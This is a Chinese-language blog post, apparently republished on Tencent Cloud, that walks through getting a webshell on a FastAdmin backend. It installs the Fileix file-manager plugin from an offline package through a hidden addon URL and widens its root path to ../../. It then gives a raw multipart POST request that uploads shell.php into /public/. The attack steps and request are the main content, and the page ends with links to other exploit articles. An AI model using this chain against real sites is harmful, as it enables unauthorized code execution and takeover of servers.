Loading [MathJax]/jax/input/TeX/config.js
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >FastAdmin后台GetShell

FastAdmin后台GetShell

作者头像
Power7089
发布于 2020-07-27 08:53:27
发布于 2020-07-27 08:53:27
1.9K00
代码可运行
举报
运行总次数:0
代码可运行

0x01 前言

FastAdmin是基于ThinkPHP5和Bootstrap的后台框架,可以利用三方插件GetShell

0x02 本地测试

FastAdmin官方源码下载地址:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
https://www.fastadmin.net/download.html

开启phpstudy本地搭建

安装成功,新版源码的后台地址是随机生成的

后台默认会有插件管理功能,但是绝大部分用户会把这个功能阉割掉

点进去看到有一堆付费和免费的插件

翻到了目前已有的三个官方发布的在线文件管理器插件,一个是官方付费版,一个是三方付费版

但是由于舍不得花十块钱买插件,所有只能用三方免费版插件,直接点击安装会需要登录账号,登录信息会记录到日志,不便于操作,所以去官方下载离线安装包

Fileix文件管理器离线安装包官方下载地址:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
https://www.fastadmin.net/store/fileix.html

点击离线安装,选择上传你下载的ZIP离线安装包

插件安装完成会自动启用,默认路径配置是这样的

然后打开是这样的

可以修改为 ../../,那么再打开就是这样的

然后浅显易懂,直接右键上传php文件就能getshell

上面是本地测试环境,真实环境会出现这样一个问题,就是点击文件管理功能不会显示任何内容

后来了解一下是因为没有配置前台页面,不太好修改,所以利用下面的方法

0x03 通用方法

1.插件管理地址:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
/admin/addon?ref=addtabs

进入后台默认不显示插件管理功能,访问插件管理地址,上传离线安装包

2.文件管理地址/读取所有文件地址:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
/admin/fileix?ref=addtabs
/admin/fileix/lst

真实环境中如果出现不显示功能的情况,必要时可以读取所有文件地址

3.上传poc:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
POST /admin/fileix/data?target=%2F HTTP/1.1
Host: localhost
Content-Length: 1050
Origin: http://localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrZmyeAB3SciJDWST
Accept: */*
Referer: http://localhost
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=xxxxxxxx
Connection: close

------WebKitFormBoundaryrZmyeAB3SciJDWST
Content-Disposition: form-data; name="upload"; filename="shell.php"
Content-Type: application/octet-stream

code
------WebKitFormBoundaryrZmyeAB3SciJDWST
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryrZmyeAB3SciJDWST
Content-Disposition: form-data; name="target"

/public/
------WebKitFormBoundaryrZmyeAB3SciJDWST--

修改host地址post过去

利用poc成功上传shell

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2020-06-05,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 程序员阿甘 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
FastAdmin前台分片传输上传文件getshell复现
FastAdmin 是一款基于 ThinkPHP 5 + Bootstrap 的极速后台开发框架。致力于服务开发者,快速搭建自己属于自己的后台。
Timeline Sec
2021/04/26
6.2K0
vulntarget-j
有注册功能,我们可以尝试一下FastAdmin前台分片传输上传文件getshell,先在前台注册一个普通用户
MssnHarvey
2023/01/30
1.5K0
vulntarget-j
CMSMS模块Showtime2任意文件上传漏洞CVE-2019-9692分析 附利用POC
CMSMadeSimple是一个简单易于使用的内容管理系统。它使用PHP,MySQL和Smarty模板引擎开发。
用户5878089
2019/07/25
1.2K0
CMSMS模块Showtime2任意文件上传漏洞CVE-2019-9692分析 附利用POC
实战 | 记一次23000美元赏金的漏洞挖掘
目标使用JSON Web Token (JWT)作为身份验证机制,我花了一些时间来理解,试图在使用 JSON Web Token (JWT) 的漏洞赏金目标上找到漏洞。
HACK学习
2023/01/03
2K0
实战 | 记一次23000美元赏金的漏洞挖掘
帮管客CRM客户管理系统Nday
漏洞大约是4月份左右交的,目前官方应该也已经修复了,总体下来感觉目前的CNVD已经不是曾经那个CNVD了,总体而言这个CRM没怎么考虑到安全问题,挖到后面漏洞交的已经不太想交了,有兴趣的可以试试挖一下其他的,这里仅给出几个点,注入之类的就暂时先不给了
Al1ex
2022/09/07
2.7K1
帮管客CRM客户管理系统Nday
漏洞复现 | 通达OA命令执行漏洞复现
通达OA是北京通达信科科技有限公司出品的 "Office Anywhere 通达网络智能办公系统"。
谢公子
2022/01/19
7.4K1
漏洞复现 | 通达OA命令执行漏洞复现
从 XSS 到 RCE 的几个开源案例
XSS 也就是大家常说的跨站脚本攻击,利用该漏洞可以执行任意 JavaScript 脚本,RCE 也就是远程名称执行,可以执行任意系统命令。那么如何通过 XSS 漏洞升级到 RCE 漏洞呢?今天分享几个开源案例。原文:
信安之路
2022/12/30
2.5K0
从 XSS 到 RCE 的几个开源案例
【护网漏洞】福建科立讯通信指挥调度管理平台任意文件上传
Al1ex
2024/07/31
5020
【护网漏洞】福建科立讯通信指挥调度管理平台任意文件上传
通达OAの漏洞合集
两三个月之前实习的时候通达OA的漏洞学习笔记,赶紧发了清一下库存,免得文件夹吃灰。
h0cksr
2023/05/18
6.2K0
CVE-2025-26319:FlowiseAI未授权任意文件写入漏洞
FlowiseAI 是一款开源的低代码/无代码工具,用于快速构建基于大语言模型(LLM)的应用程序。它通过可视化拖拽组件,让用户无需或仅需少量编码就能创建聊天机器人、文档问答等应用,并支持多种大语言模型和向量数据库的集成。其核心功能包括记忆与对话、API 嵌入等,可应用于工作流自动化和文档问答等场景。FlowiseAI 支持本地、Docker 和云平台部署,完全开源免费,适合开发者和非技术用户快速搭建 AI 应用。
Timeline Sec
2025/06/11
3190
CVE-2025-26319:FlowiseAI未授权任意文件写入漏洞
【漏洞复现】泛微-云桥e-Bridge EC8.0 文件上传
泛微-云桥是一款基于云计算技术的企业级协作与办公平台,提供文档管理、流程审批、项目协作等功能,旨在提升企业内部沟通效率与工作协同能力。 /wxclient/app/recruit/resume/addResume 接口存在任意文件上传漏洞
没事就要多学习
2024/08/11
1.2K0
【漏洞复现】泛微-云桥e-Bridge EC8.0 文件上传
漏洞挖掘之通达OA2017任意文件上传
通达OA系统代表了协同OA的先进理念,16年研发铸就成熟OA产品,协同OA软件行业唯一央企团队研发,多次摘取国内OA软件金奖,拥有2万多家正式用户,8万多家免费版用户。
乌鸦安全
2021/08/05
3.1K2
漏洞挖掘之通达OA2017任意文件上传
通达OA代码审计篇二 - 11.8 后台Getshell
前篇中提到的漏洞在11.8版本中被完全修复后,我痛定思痛,从头开始找一个新的漏洞,于是就有了今天这个漏洞的诞生,但没想到的是,在保留到2021年初时,1月11号更新的11.9版本中再次被定向修复。
LoRexxar
2023/02/21
2.1K0
通达OA代码审计篇二 - 11.8 后台Getshell
【干货】HW2023POC收集
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他违法行为!!!
释然IT杂谈
2023/08/18
9600
【干货】HW2023POC收集
通达OA文件上传文件包含漏洞解析
通达OA是由北京通达信科科技有限公司开发的一款办公系统,近日通达官方在其官网发布了安全提醒与更新程序,并披露有用户遭到攻击。 攻击者可在未授权的情况下可上传图片木马文件,之后通过精心构造的请求进行文件包含,实现远程命令执行,且攻击者无须登陆认证即可完成攻击。
逍遥子大表哥
2021/12/18
2.2K0
通达OA文件上传文件包含漏洞解析
VNCTF2024-WP
没啥时间打了,简单看了一下这次VNCTF,质量还是挺高的,有的没看的题等有师傅发WP再复现看看。
故里[TRUE]
2024/02/18
7780
VNCTF2024-WP
CVE-2024-21683:Confluence远程代码执行漏洞
Atlassian Confluence是一款由Atlassian开发的企业团队协作和知识管理软件,提供了一个集中化的平台,用于创建、组织和共享团队的文档、知识库、项目计划和协作内容,从而有效地管理项目知识和信息。Confluence 还集成了多种宏和插件,如日程表、任务列表和Jira集成。
Timeline Sec
2024/07/15
1.3K0
CVE-2024-21683:Confluence远程代码执行漏洞
java文件上传报文解析与实现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
逝兮诚
2019/10/30
1.5K0
修仙第一步:08CMS SQL 注入
0x00 背景 本周,拿到一个源码素材是08cms的,由某师傅提供的,审计的时候发现这个CMS数据传递比较复杂,使用静态分析的方式不好操作,刚好这周小三上位(换了新电脑),就直接安装下。phpstorm+xdebug+xdebug-ext(火狐)进行动态分析,本篇主要是以SQL注入漏洞为例子,进行动态分析的演练,当然源码还有其他漏洞待挖掘,期待师傅们一起交流讨论。 0x01 审计过程 动态分析环境配置 动态分析组合:phpstorm+xdebug+xdebug-ext(火狐) 相信小伙伴们关注本公号这么久
漏斗社区
2018/04/17
1K0
修仙第一步:08CMS SQL 注入
通达OA getshell | Nmap 脚本
local stdnse = require "stdnse" local shortport = require "shortport" local http = require "http" local string = require "string" local base64 = require "base64" description = "TDOA upload & lfi" author = "test94" license = "Same as Nmap--See https://nmap
意大利的猫
2020/08/20
1.7K0
相关推荐
FastAdmin前台分片传输上传文件getshell复现
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验